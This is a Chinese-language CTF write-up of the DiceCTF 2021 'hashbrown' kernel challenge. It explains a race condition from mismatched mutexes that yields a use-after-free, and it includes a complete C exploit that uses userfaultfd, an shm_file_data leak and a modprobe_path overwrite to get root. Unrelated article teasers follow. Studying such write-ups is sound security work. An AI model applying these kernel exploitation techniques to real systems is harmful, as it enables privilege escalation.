【互斥锁不当使用导致的条件竞争】2021_DiceCTF_hashbrown

news2024/11/25 21:44:47

前言

这个题目还挺有意思的,他并不像之前做的题目直接给你一个贴脸的 UAF 等,而是把 UAF 放在了条件竞争的环境下,其实条件竞争这个漏洞在内核中经常出现。

这里题目没有去符号,所以逆向的难度不是很大,但作者似乎在比赛几个小时后就放出了源码,应该是看做的人比较少。但我建议读者直接进行逆向,因为题目没有去符号所以逆向难度不是很大,而且还可以锻炼一下逆向的能力。笔者就是逆向能力比较弱,但如果在真实场景中,逆向能力还是很重要的(扯的有点远了)。

漏洞分析

保护:开了 smap、smep、pti、kaslr 基本都是标配了

并且具有如下编译选项:用的 slab,所以堆上不存在 freelist,而且开了 FG-KASLR。内核版本 v-5.11.0,userfaultfd 最后的荣光

CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB=y
CONFIG_FG_KASLR=y

题目维护着一个哈希结构:bucket_count 初始为 0x10,entry_count_max 初始为 0xc

其中 entry_count 最大 1024,bucket_count 最大 511

函数比较多,有 add_key / delete_key / delete_value / get_value / update_value / resize 函数,就分析漏洞利用中关键的函数了,而且函数功能从名字就可以看出来了。

其中操作 resize 时使用的是 resize_lock 互斥锁,而其他函数都是使用的 operations_lock 互斥锁:

这里其实就非常明显的条件竞争了,如果题目只使用一个互斥锁的话,那么这个模块就是安全的。

用户需要传入如下结构体:这里笔者将用户传入的 request_t 结构体称作 req

typedef struct request_t {
        uint32_t key;
        uint32_t value_size;
        char* src;
        char* dest;
}request_t;

漏洞点

 1)当 hashmap 中 entry_count < entry_count_max 时

根据 req.key 与 hashmap.bucket_count 计算出一个 hask_idx,然后根据 req.value_size/src 创建一个 hask_entry,并将其链入链表尾

2)当 当 hashmap 中 entry_count == entry_count_max 并且 hashmap.bucket_count <= 511 时

这时候会调用 resize 函数扩充 buckets,这里 entry_count_max 之所以不是 bucket_count,笔者认为是为了避免哈希冲突。

整体的逻辑比较简单,将 bucket_count 扩大两倍,然后重新分配 bockets 数组,并重新分配 hash_entry 即 new_hash_entry,并把原来的 hash_entry 内容复制到 new_hash_entry,所以这里复用了 value 堆块(这里笔者想了想 old_hash_entry 也可以直接复用啊,可以是为了做题吧)。然后根据用户传入的 key 判断是否需要创建新的 hash_entry,最后将 new_bockets 链入 hashmap 中,然后释放掉所有的原来的 hash_entry

可以看到,这里使用了 copy_from_user,并且这里 hashmap.buckets 中链接的是原来的 buckets,所以如果我们利用 userfaultfd 卡住,然后在另外的线程中就可以释放 value,这时候新的 new_buckets 中 hash_enrty.value 保存的还是该指针。

这里我不知道咋表述,画了个图:

比如我们用 userfaultfd 将其卡住,这是我们在另一个线程中释放掉 value,那么最后 new_buckets 链入 hashmap 时就存在 UAF。

漏洞利用

value 的大小限制为 [1,0xb0],所以想法还是挺多的。这里笔者打的是 modprobe_path

 1)shm_file_data 泄漏 kernel_offset

这里笔者利用的是 shm_file_data 去泄漏 kernel_offset,很简单,将 value 释放掉,然后分配 shm_file_data 拿到 UAF 堆块,然后利用 get_vaule 即可得到 shm_file_data 中的数据

2)任意地址写 modprobe_path

这里就是简单的堆风水,形成如下堆布局:

这样就可以通过 hash_entry_1 去修改 hash_entry_2 的 value_ptr 指针指向 modprobe_path,然后在利用 hash_entry_2 去修改 modprobe_path 的内容

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

#define SHM_FILE_DATA_NUMS 0x100
int fd;
int shm_id;
int shm_ids[SHM_FILE_DATA_NUMS];
size_t init_ipc_ns = 0xffffffff81b0dca0;
size_t kernel_offset = 0;

typedef struct request_t {
        uint32_t key;
        uint32_t value_size;
        char* src;
        char* dest;
}request_t;

void add_key(uint32_t key, uint32_t value_size, char* src)
{
        request_t req = { .key = key, .value_size = value_size, .src = src };
        ioctl(fd, 0x1337, &req);
}

void dele_value(uint32_t key)
{
        request_t req = { .key = key };
        ioctl(fd, 0x133A, &req);
}

void get_value(uint32_t key, uint32_t value_size, char* dest)
{
        request_t req = { .key = key, .value_size = value_size, .dest = dest };
        ioctl(fd, 0x133B, &req);
}

void update_value(uint32_t key, uint32_t value_size, char* src)
{
        request_t req = { .key = key, .value_size = value_size, .src = src };
        ioctl(fd, 0x1339, &req);
}

void dele_key(uint32_t key)
{
        request_t req = { .key = key };
        ioctl(fd, 0x1338, &req);
}

void resize(uint32_t key, uint32_t value_size, char* src)
{
        request_t req = { .key = key, .value_size = value_size, .src = src };
        ioctl(fd, 0x1337, &req);
}

uint32_t get_hash_idx(uint32_t key, uint32_t size)
{
  return (size - 1) & ((key >> 12) ^ (key >> 20) ^ key ^ (((key >> 12) ^ (key >> 20) ^ key) >> 4) ^ (((key >> 12) ^ (key >> 20) ^ key) >> 7));
}

void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
                puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}

char copy_src[0x1000];
void* handler(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler");
                memset(copy_src, 'B', sizeof(copy_src));
                dele_value(0);
                if ((shm_id = shmget(IPC_PRIVATE, 0x1000, 0666|IPC_CREAT)) < 0) err_exit("FAILED to shmget");
                if (shmat(shm_id, NULL, 0) < 0) err_exit("FAILED to shmat");
                for (int i = 1; i < 0xc; i++)
                {
                        dele_value(i);
                }
//              dele_value(1);
//              dele_value(2);

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag.txt' > /home/ctf/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /home/ctf/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /home/ctf/dummy"); // 非法格式的二进制文件
        system("chmod +x /home/ctf/dummy");
        system("/home/ctf/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
        sleep(0.3);
        system("cat /flag.txt");
        exit(0);
}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        fd = open("/dev/hashbrown", O_RDWR);
        if (fd < 0) err_exit("FAILED to open dev file");

        char buf[0x20];
        char* uffd_buf  = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        pthread_t uffd_thr;
        if (uffd_buf == NULL) err_exit("FAILED to mmap for uffd_buf");
        register_userfaultfd(&uffd_thr, uffd_buf, 0x1000, handler);

        memset(buf, 'A', sizeof(buf));
//      for (int i = 0; i < 0xc; i++)
//              printf("%d ==> %d\n", i, get_hash_idx(0x10, i));

        add_key(0, 0x20, buf);
        for (int i = 1; i < 0xc; i++)
        {
                add_key(i, 0x18, buf);
        }

        resize(0xc, 0x40, uffd_buf);

        get_value(0, 0x20, buf);
        binary_dump("shm_file_data", buf, 0x20);
        kernel_offset = *(size_t*)(buf+0x8) - init_ipc_ns;
        hexx("kernel_offset", kernel_offset);

        for (int i = 0; i < 0xc+0xc/2; i++)
        {
                if ((shm_ids[i] = shmget(IPC_PRIVATE, 0x1000, 0666|IPC_CREAT)) < 0) err_exit("FAILED to shmget");
                if (shmat(shm_ids[i], NULL, 0) < 0) err_exit("FAILED to shmat");
        }
        memset(buf, 'B', sizeof(buf));
        add_key(0xd, 0x18, buf);
/*
        for (int i = 0; i < 0xe; i++)
        {
                memset(buf, 0, sizeof(buf));
                get_value(i, 0x18, buf);
                printf("hash entry idx: %#x ==> ", i);
                binary_dump("hash entry data", buf, 0x20);
        }
*/
        *(uint32_t*)buf = 0xd;
        *(uint32_t*)(buf+4) = 0x18;
        *(uint64_t*)(buf+0x8) = 0xffffffff81a46fe0+kernel_offset;
        *(uint64_t*)(buf+0x10) = 0;
        update_value(5, 0x18, buf);
        memset(buf, 0, sizeof(buf));
        get_value(0xd, 0x18, buf);
        binary_dump("hash entry d", buf, 0x20);

        memset(buf, 0, sizeof(buf));
        strcpy(buf, "/home/ctf/x");
        update_value(0xd, 0x18, buf);
        get_flag();
        puts("[X] EXP NEVER END");
        return 0;
}

效果如下:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1292195.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Axure教程】树筛选中继器表格

树和表格是信息系统中两个重要的元件&#xff0c;树结构是一种层次化的数据结构&#xff0c;它以树的形式展示数据的层次关系&#xff1b;表格是一种二维结构&#xff0c;由行和列组成。每一行表示一个记录&#xff0c;每一列表示一个属性。在实际应用中&#xff0c;这两种结构…

陈睿接手一年后,B站全力一搏的游戏业务怎样了

11月末&#xff0c;哔哩哔哩公布了截至2023年9月30日的第三季度财报。 就在去年的这个时候&#xff0c;陈睿宣布亲自接手了B站的游戏业务。因为做游戏比给游戏打广告利润高&#xff0c;因为自研游戏利润更高&#xff0c;更因为年年亏损的B站需要这么高利润的业务来拯救。 但一…

Python文件操作(txt + xls + json)

文章目录 简介1、使用with_open读取和保存&#xff1a;.txt .bin&#xff08;二进制文本&#xff09;1.1、with open语句详解1.1、项目实战 2、使用pandas读取和保存&#xff1a;.xls .xlsx2.1、pandas简介2.2、环境配置2.3、项目实战 3、 使用json.dump读取和保存&#xff1…

MS8091/2运算放大器可Pin to Pin兼容AD8091/2

MS809x 系列是一种易用的、低成本的轨到轨输出电压反馈放大器&#xff0c;它具有典型的电流反馈放大器带宽和转换率的优势&#xff0c;同时也有较大的共模电压输入范围和输出摆幅&#xff0c;这使它很容易在单电源 2.5V 的低压情况下工作。可Pin to Pin兼容AD8091/AD8092。 虽然…

速达软件任意文件上传漏洞复现

简介 速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏…

Android渲染-AHardwareBuffer

本文主要从应用的角度介绍android的native层AHardwareBuffer创建纹理以及保存渲染数据。 HardwareBuffer 要介绍native层的AHardwareBuffer&#xff0c;就需要先从Java层的HardwareBuffer说起。Android官方对于HardwareBuffer介绍如下&#xff1a; HardwareBuffer wraps a na…

中国科技巨头:集体变革中 /华为鸿蒙 4:功能、模型、生态三大升级 |魔法半周报

我有魔法✨为你劈开信息大海❗ 高效获取AIGC的热门事件&#x1f525;&#xff0c;更新AIGC的最新动态&#xff0c;生成相应的魔法简报&#xff0c;节省阅读时间&#x1f47b; &#x1f525;资讯预览 中国科技巨头&#xff1a;集体变革中 华为鸿蒙 4&#xff1a;功能、模型、生…

宁夏一男子吸烟“逼”慢高铁 拘留7天 AI技术如何提升公共安全

最近&#xff0c;宁夏的一位男子杨某在高铁卫生间吸烟&#xff0c;触发了列车的烟雾报警系统&#xff0c;导致列车降速运行&#xff0c;最终被拘留7天。这个事件凸显了公共安全的重要性&#xff0c;特别是在交通工具上的安全管理。如果我们能够及时发现并阻止这种行为&#xff…

0011Java程序设计-ssm药店管理系统微信小程序

文章目录 摘 要目 录系统实现5.2服务端开发环境 编程技术交流、源码分享、模板分享、网课分享 企鹅&#x1f427;裙&#xff1a;776871563 摘 要 随着我国经济迅速发展&#xff0c;人们对手机的需求越来越大&#xff0c;各种手机软件也都在被广泛应用&#xff0c;但是对于手机…

互联网医院|北京互联网医院系统开发功能

打造移动互联网医院&#xff0c;就是&#xff0c;通过移动互联网将医院与患者、医院内部&#xff08;医生、护士、领导层&#xff09;、医院与生态链上的各类组织机构连接起来。以患者为中心&#xff0c;优化医院业务流程&#xff0c;提升医疗服务质量与医院资源能效&#xff0…

SQL Server数据库的备份和还原

6.2 SQL Server备份和还原 数据库管理员最担心的情况就是数据库瘫痪&#xff0c;造成数据丢失&#xff0c;而备份作为数据的副本&#xff0c;可以有 效地保护和恢复数据。本节将介绍数据备份的原因&#xff0c;备份的方式.SOL Server的恢复模式.以及备 份策略和备份设备。 6.2…

KubeSphere Marketpalce 上新!Databend Playground 助力快速启动数据分析环境

12 月 5 日&#xff0c;Databend Labs 旗下 Databend Playground&#xff08;社区尝鲜版&#xff09;成功上架青云科技旗下 KubeSphere Marketplace 云原生应用扩展市场&#xff0c;为用户提供一个快速学习和验证 Databend 解决方案的实验环境。 关于 Databend Playground Dat…

视频集中存储/智能分析融合云平台EasyCVR平台接入rtsp,突然断流是什么原因?

安防视频监控/视频集中存储/云存储/磁盘阵列EasyCVR平台可拓展性强、视频能力灵活、部署轻快&#xff0c;可支持的主流标准协议有国标GB28181、RTSP/Onvif、RTMP等&#xff0c;以及支持厂家私有协议与SDK接入&#xff0c;包括海康Ehome、海大宇等设备的SDK等。平台既具备传统安…

销售如何开发客户?

在销售过程中&#xff0c;开发客户是至关重要的一环。只有拥有足够的客户群体&#xff0c;才能为公司带来更多的业务机会和收入。 现如今&#xff0c;不管是哪一行竞争都十分激烈&#xff0c;特别是那些本身没有核心竞争力和核心技术的传统 to b企业&#xff0c;正处于十分尴尬…

输入一个月份,告知这个月份属于哪个季节的

一、输入特点 使用switch语句&#xff0c;属于月份的数字&#xff1b;如果和月份的数字没有关系则会显示【你的输入有错误&#xff01;】。 二、输入代码 import java.util.Scanner; public class judgeSeasonDemo {public static void main(String[] args){try (Scanner s…

Linux | tar,bc,uname指令

Linux | tar&#xff0c;bc&#xff0c; 文章目录 Linux | tar&#xff0c;bc&#xff0c;tar指令【重要】bc指令uname –r指令 tar指令【重要】 tar [-cxtzjvf] 文件与目录 … 参数&#xff1a; -c &#xff1a;建立一个压缩文件的参数指令(create 的意思)&#xff1b;-x &am…

网站测试都要测试哪些?如何进行测试?

1 UI测试 看页面是否美观养眼(包括页面的布局是否合理&#xff0c;策划是否舒服美观&#xff0c;页面长度是否合理&#xff0c;前景色与背景色是否搭配&#xff0c;页面风格是否统一&#xff0c;色调是否适合人眼&#xff0c;会不会太刺眼&#xff0c;字体大小是否合适&#x…

科技云报道:AI+PaaS,中国云计算市场迎来新“变量”?

科技云报道原创。 没有小的市场&#xff0c;只有还没有被发现的大生意。 随着企业数字化转型的逐级深入&#xff0c;市场需求进一步向PaaS和SaaS层进发&#xff0c;使之成为公有云服务市场增长的主要动力。 根据IDC最新发布的报告显示&#xff0c;2022-2027五年间中国公有云…

HarmonyOS开发工具DevEco Studio的下载和安装

一、DevEco Studio概述 一、下载安装鸿蒙应用开发工具DevEco Studio 开发鸿蒙应用可以从鸿蒙系统上运行第一个程序Hello World开始。 为了得到这个Hello World&#xff0c;你需要得到这个Hello World的源代码&#xff0c;源代码是用人比较容易看得懂的计算机编程语言规范写的…

私域最全养号攻略---微信

微信号的使用规则&#xff1a; 注册新微信、微信实名认证、主动添加好友、面对面建群、被动添加好友、进群限制、朋友圈限制、好友上限 微信权重加分规则&#xff1a; 基础信息是否完整、注册时间、微信使用行为、 微信权重扣分规则&#xff1a; 使用的环境是否正常、部分行为会…